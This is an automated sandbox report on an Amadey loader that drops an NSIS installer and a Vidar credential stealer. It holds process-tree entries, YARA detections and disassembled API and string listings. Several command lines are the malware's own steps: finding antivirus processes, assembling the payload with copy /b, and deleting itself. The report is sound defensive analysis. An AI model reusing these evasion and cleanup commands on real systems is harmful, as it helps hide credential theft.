Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000003.1658017115.00000000048E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000002.1698207716.00000000000F1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	00:02:57
Start date:	19/08/2024
Path:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
Imagebase:	0x40000
File size:	1'916'928 bytes
MD5 hash:	44AE545CA405437B73165B8247A83569
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000001.00000003.1685161264.0000000004830000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000001.00000002.1725519016.0000000000041000.00000040.00000001.01000000.00000008.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 55%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	00:02:57
Start date:	19/08/2024
Path:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Imagebase:	0x40000
File size:	1'916'928 bytes
MD5 hash:	44AE545CA405437B73165B8247A83569
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000003.1688423939.0000000004830000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000002.1728683061.0000000000041000.00000040.00000001.01000000.00000008.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	00:04:00
Start date:	19/08/2024
Path:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Imagebase:	0x40000
File size:	1'916'928 bytes
MD5 hash:	44AE545CA405437B73165B8247A83569
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000007.00000003.2311850490.0000000004830000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	00:04:03
Start date:	19/08/2024
Path:	C:\Users\user\AppData\Local\Temp\1000156001\seo.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1000156001\seo.exe"
Imagebase:	0x400000
File size:	972'074 bytes
MD5 hash:	6F858C09E6D3B2DBD42ADC2FB19B217B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	00:04:04
Start date:	19/08/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /k move Vote Vote.cmd & Vote.cmd & exit
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	00:04:04
Start date:	19/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	00:04:05
Start date:	19/08/2024
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0x920000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	00:04:05
Start date:	19/08/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /I "wrsa.exe opssvc.exe"
Imagebase:	0xbc0000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	00:04:05
Start date:	19/08/2024
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0x920000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	00:04:05
Start date:	19/08/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /I "avastui.exe avgui.exe bdservicehost.exe ekrn.exe nswscsvc.exe sophoshealth.exe"
Imagebase:	0xbc0000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	00:04:06
Start date:	19/08/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c md 419591
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	00:04:06
Start date:	19/08/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /V "SAVEDBEDFLESHPROVIDED" Waves
Imagebase:	0xbc0000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	00:04:06
Start date:	19/08/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c copy /b ..\Poll + ..\Memorabilia + ..\Kenny + ..\Rick + ..\Britannica + ..\Circuits J
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	00:04:06
Start date:	19/08/2024
Path:	C:\Users\user\AppData\Local\Temp\419591\Predicted.pif
Wow64 process (32bit):	true
Commandline:	Predicted.pif J
Imagebase:	0x200000
File size:	893'608 bytes
MD5 hash:	C56B5F0201A3B3DE53E561FE76912BFD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000012.00000003.3398813743.00000000019AB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000012.00000002.4068055987.00000000049A1000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000012.00000002.4067329354.0000000001B7F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000012.00000002.4068055987.0000000004B0E000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000012.00000002.4068055987.0000000004B0E000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000012.00000003.3403411125.00000000049A9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000012.00000002.4066348704.00000000017D4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000012.00000003.3403233137.0000000001BAD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000012.00000003.3401397681.0000000001911000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000012.00000002.4066793871.0000000001910000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000012.00000002.4067329354.0000000001BAC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 3%, ReversingLabs
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	00:04:06
Start date:	19/08/2024
Path:	C:\Windows\SysWOW64\choice.exe
Wow64 process (32bit):	true
Commandline:	choice /d y /t 5
Imagebase:	0x910000
File size:	28'160 bytes
MD5 hash:	FCE0E41C87DC4ABBE976998AD26C27E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	00:06:55
Start date:	19/08/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\419591\Predicted.pif" & rd /s /q "C:\ProgramData\EBGCFBGCBFHJ" & exit
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	22
Start time:	00:06:55
Start date:	19/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	23
Start time:	00:06:56
Start date:	19/08/2024
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout /t 10
Imagebase:	0x780000
File size:	25'088 bytes
MD5 hash:	976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Function 04AF079D Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1706561229.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4af0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91e22a2c3fa37364b88e42e859dcc1d1a655b91546c68ee1aeb8331ef5e03830
Instruction ID: 42cff39ce6838025630f5ba8462fd403540e18590f403abe12b5534c5004fee7
Opcode Fuzzy Hash: 91e22a2c3fa37364b88e42e859dcc1d1a655b91546c68ee1aeb8331ef5e03830
Instruction Fuzzy Hash: FEE026FB38C920EE904000D16E047B7BB7DF4927313708067F683C4003B284124978B1

Analysis Process: seo.exePID: 7372, Parent PID: 7264COMMON

Execution Graph

Execution Coverage:	12.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	21.4%
Total number of Nodes:	1325
Total number of Limit Nodes:	21

Executed Functions

Function 00403415 Relevance: 52.8, APIs: 22, Strings: 8, Instructions: 307
filestringcomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

#17.COMCTL32 ref: 00403434
SetErrorMode.KERNELBASE(00008001), ref: 0040343F
OleInitialize.OLE32(00000000), ref: 00403446

Part of subcall function 00405BBF: GetModuleHandleA.KERNEL32(?,?,00000020,00403458,00000008), ref: 00405BCF
Part of subcall function 00405BBF: LoadLibraryA.KERNELBASE(?,?,00000020,00403458,00000008), ref: 00405BDA
Part of subcall function 00405BBF: GetProcAddress.KERNEL32(00000000,?), ref: 00405BEB

SHGetFileInfoW.SHELL32(0040856C,00000000,?,000002B4,00000000), ref: 0040346E

Part of subcall function 00405AB8: lstrcpynW.KERNEL32(?,?,00002004,00403483,004732A0,NSIS Error), ref: 00405AC5

GetCommandLineW.KERNEL32(004732A0,NSIS Error), ref: 00403483
GetModuleHandleW.KERNEL32(00000000,004CC0A0,00000000), ref: 00403496
CharNextW.USER32(00000000,004CC0A0,00000020), ref: 004034BD
GetTempPathW.KERNEL32(00002004,004E00C8,00000000,00000020), ref: 00403590
GetWindowsDirectoryW.KERNEL32(004E00C8,00001FFF), ref: 004035A5
lstrcatW.KERNEL32(004E00C8,\Temp), ref: 004035B1
DeleteFileW.KERNELBASE(004DC0C0), ref: 004035C8
OleUninitialize.OLE32(?), ref: 00403659
ExitProcess.KERNEL32 ref: 00403679
lstrcatW.KERNEL32(004E00C8,~nsu.tmp), ref: 00403685
lstrcmpiW.KERNEL32(004E00C8,004D80B8,004E00C8,~nsu.tmp), ref: 00403691
CreateDirectoryW.KERNEL32(004E00C8,00000000), ref: 0040369D
SetCurrentDirectoryW.KERNEL32(004E00C8), ref: 004036A4
DeleteFileW.KERNEL32(0043BD40,0043BD40,?,00480008,0040850C,0047C000,?), ref: 004036F5
CopyFileW.KERNEL32(004E80D8,0043BD40,00000001), ref: 00403709
CloseHandle.KERNEL32(00000000,0043BD40,0043BD40,?,0043BD40,00000000), ref: 00403736
GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 0040378C
ExitWindowsEx.USER32(00000002,00000000), ref: 004037C8

Strings

NCRC, xrefs: 0040350C
/D=, xrefs: 00403537
\Temp, xrefs: 004035AB
Error launching installer, xrefs: 0040360C
~nsu.tmp, xrefs: 0040367F
SeShutdownPrivilege, xrefs: 0040379E
_?=, xrefs: 004035F4
NSIS Error, xrefs: 00403474

Memory Dump Source

Source File: 00000008.00000002.2354695113.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2354641796.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354731360.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.0000000000432000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.0000000000469000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2355035395.00000000004FD000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_seo.jbxd

Similarity

API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
API String ID: 2435955865-3712954417
Opcode ID: 7a316b5055b30f9aaac34ad57f3eca8da3b8ee04e2000637dca67fb3c636fbe9
Instruction ID: 24a773ffd11e725b17f64a587af86d00896606ebd673f2b671a94fa35e787169
Opcode Fuzzy Hash: 7a316b5055b30f9aaac34ad57f3eca8da3b8ee04e2000637dca67fb3c636fbe9
Instruction Fuzzy Hash: BBA1E670500701BBD6207F629D4AB1B7E9CEB01705F10483FF985B62D2DBBD9A458BAE

Function 00405B98 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(?,00464A20,0045FE18,00406093,0045FE18), ref: 00405BA3
FindClose.KERNEL32(00000000), ref: 00405BAF

Strings

JF, xrefs: 00405B99

Memory Dump Source

Source File: 00000008.00000002.2354695113.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2354641796.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354731360.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.0000000000432000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.0000000000469000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2355035395.00000000004FD000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_seo.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: JF
API String ID: 2295610775-1378213080
Opcode ID: 8a2fef2aada0d280f7cfc8c7f2d825c9d5ff996b33c7372124f3e42565b734a1
Instruction ID: 1ee526d225bc4302f24aa9e13179370b3debcda52a21c952381bfba9845ea930
Opcode Fuzzy Hash: 8a2fef2aada0d280f7cfc8c7f2d825c9d5ff996b33c7372124f3e42565b734a1
Instruction Fuzzy Hash: 51D022301095206FC60003386D0C88B3A28EF0A3303104B32F1A5F22E0C7B4AC638A9C

Function 00405BBF Relevance: 4.5, APIs: 3, Instructions: 19
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(?,?,00000020,00403458,00000008), ref: 00405BCF
LoadLibraryA.KERNELBASE(?,?,00000020,00403458,00000008), ref: 00405BDA
GetProcAddress.KERNEL32(00000000,?), ref: 00405BEB

Memory Dump Source

Source File: 00000008.00000002.2354695113.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2354641796.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354731360.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.0000000000432000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.0000000000469000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2355035395.00000000004FD000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_seo.jbxd

Similarity

API ID: AddressHandleLibraryLoadModuleProc
String ID:
API String ID: 310444273-0
Opcode ID: 0ccf96f21d4775823ebfa39c65d9289fef824585f99c9f9fa051364898666991
Instruction ID: e5a37bd0471b14276c9a44c6b696aa1abbb9d0f0bd66a2a471ce49017894d203
Opcode Fuzzy Hash: 0ccf96f21d4775823ebfa39c65d9289fef824585f99c9f9fa051364898666991
Instruction Fuzzy Hash: 9DE08C32600A1297DA101B609E0896B777CAB89640302C43EF545B2011DB34B825ABAD

Function 004053F8 Relevance: 44.0, APIs: 15, Strings: 10, Instructions: 227
stringregistrylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00405BBF: GetModuleHandleA.KERNEL32(?,?,00000020,00403458,00000008), ref: 00405BCF
Part of subcall function 00405BBF: LoadLibraryA.KERNELBASE(?,?,00000020,00403458,00000008), ref: 00405BDA
Part of subcall function 00405BBF: GetProcAddress.KERNEL32(00000000,?), ref: 00405BEB

lstrcatW.KERNEL32(004DC0C0,0044FD98), ref: 0040547C
lstrlenW.KERNEL32(EnglandAdventureMinnesotaCourtesyEnsuringEmission,?,?,?,EnglandAdventureMinnesotaCourtesyEnsuringEmission,00000000,004D00A8,004DC0C0,0044FD98,80000001,Control Panel\Desktop\ResourceLocale,00000000,0044FD98,00000000,00000006,004CC0A0), ref: 004054FF
lstrcmpiW.KERNEL32(?,.exe,EnglandAdventureMinnesotaCourtesyEnsuringEmission,?,?,?,EnglandAdventureMinnesotaCourtesyEnsuringEmission,00000000,004D00A8,004DC0C0,0044FD98,80000001,Control Panel\Desktop\ResourceLocale,00000000,0044FD98,00000000), ref: 00405512
GetFileAttributesW.KERNEL32(EnglandAdventureMinnesotaCourtesyEnsuringEmission), ref: 0040551D
LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004D00A8), ref: 0040556F

Part of subcall function 004059FF: wsprintfW.USER32 ref: 00405A0C

RegisterClassW.USER32(00473240), ref: 004055BF
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004055D6
CreateWindowExW.USER32(00000080,?,00000000,80000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00405608

Part of subcall function 004039FC: SetWindowTextW.USER32(00000000,004732A0), ref: 00403A97

ShowWindow.USER32(00000005,00000000), ref: 0040563E
LoadLibraryW.KERNEL32(RichEd20), ref: 0040564F
LoadLibraryW.KERNEL32(RichEd32), ref: 0040565A
GetClassInfoW.USER32(00000000,RichEdit20A,00473240), ref: 00405669
GetClassInfoW.USER32(00000000,RichEdit,00473240), ref: 00405676
RegisterClassW.USER32(00473240), ref: 00405683
DialogBoxParamW.USER32(?,00000000,00404F45,00000000), ref: 004056A2

Strings

.exe, xrefs: 0040550C
RichEdit20A, xrefs: 00405663, 00405679
RichEd20, xrefs: 0040564A
_Nb, xrefs: 00405589
EnglandAdventureMinnesotaCourtesyEnsuringEmission, xrefs: 004054C3, 004054C8, 004054D9, 0040552C, 00405532
.DEFAULT\Control Panel\International, xrefs: 00405467
Control Panel\Desktop\ResourceLocale, xrefs: 00405440
RichEdit, xrefs: 00405670
RichEd32, xrefs: 00405655
@2G, xrefs: 0040557E

Memory Dump Source

Source File: 00000008.00000002.2354695113.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2354641796.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354731360.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.0000000000432000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.0000000000469000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2355035395.00000000004FD000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_seo.jbxd

Similarity

API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
String ID: .DEFAULT\Control Panel\International$.exe$@2G$Control Panel\Desktop\ResourceLocale$EnglandAdventureMinnesotaCourtesyEnsuringEmission$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
API String ID: 608394941-3267617764
Opcode ID: c9e60b1b3c0f802fbfd7db3f6b9b6b56d484588749bd373d4ce2741afa478592
Instruction ID: 3004e29146ce1891a10f4484e48a0599eb6fbea5d6fbf796412b55f756561b6a
Opcode Fuzzy Hash: c9e60b1b3c0f802fbfd7db3f6b9b6b56d484588749bd373d4ce2741afa478592
Instruction Fuzzy Hash: 7F7104B0601A11BED710ABA5AD46F6F366CEB44304F40043BF949B62E2DB794D818FAD

Function 00402EE7 Relevance: 22.9, APIs: 6, Strings: 7, Instructions: 175
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00402F59
GetTickCount.KERNEL32 ref: 00402FFA
MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 00403023
wsprintfW.USER32 ref: 00403036
WriteFile.KERNELBASE(00000000,00000000,00422579,004032FA,00000000), ref: 00403067
WriteFile.KERNEL32(00000000,0041E170,?,00000000,00000000,0041E170,?,000000FF,00000004,00000000,00000000,00000000), ref: 004030FF

Strings

pA, xrefs: 00402FAE
y%B, xrefs: 00402FD7, 00402FF2, 0040307B
... %d%%, xrefs: 00403030
p!B, xrefs: 00402F13
pA, xrefs: 004030E2
(=C, xrefs: 00402F65
|A, xrefs: 00402FC0, 00402FD2

Memory Dump Source

Source File: 00000008.00000002.2354695113.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2354641796.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354731360.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.0000000000432000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.0000000000469000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2355035395.00000000004FD000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_seo.jbxd

Similarity

API ID: CountFileTickWrite$wsprintf
String ID: (=C$... %d%%$p!B$pA$pA$y%B$|A
API String ID: 651206458-3430159628
Opcode ID: 8c4c8dbab1ebe0afa4682773c2b87886d0ac197ebae181545411c68e098dc53f
Instruction ID: 169c75f2852f129af83c9b1986440f01f3d96746b5d1a97a5bed7113fa09ea58
Opcode Fuzzy Hash: 8c4c8dbab1ebe0afa4682773c2b87886d0ac197ebae181545411c68e098dc53f
Instruction Fuzzy Hash: 1C617B7190121AEBCF10CF65EA446AF7BB8AF44751F14413BE900B72D0D7B89A40DBA9

Function 0040311B Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 182
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 0040312C
GetModuleFileNameW.KERNEL32(00000000,004E80D8,00002004,?,?,?,00000000,004035D7,?), ref: 00403148

Part of subcall function 004058FE: GetFileAttributesW.KERNELBASE(00000003,0040315B,004E80D8,80000000,00000003,?,?,?,00000000,004035D7,?), ref: 00405902
Part of subcall function 004058FE: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,004035D7,?), ref: 00405924

GetFileSize.KERNEL32(00000000,00000000,004EC0E0,00000000,004D80B8,004D80B8,004E80D8,004E80D8,80000000,00000003,?,?,?,00000000,004035D7,?), ref: 00403194

Strings

Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403359
Error launching installer, xrefs: 0040316B
soft, xrefs: 00403209
Null, xrefs: 00403212
Inst, xrefs: 00403200

Memory Dump Source

Source File: 00000008.00000002.2354695113.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2354641796.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354731360.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.0000000000432000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2354762381.0000000000469000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2355035395.00000000004FD000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_seo.jbxd

Similarity

API ID: File$AttributesCountCreateModuleNameSizeTick
String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 4283519449-527102705
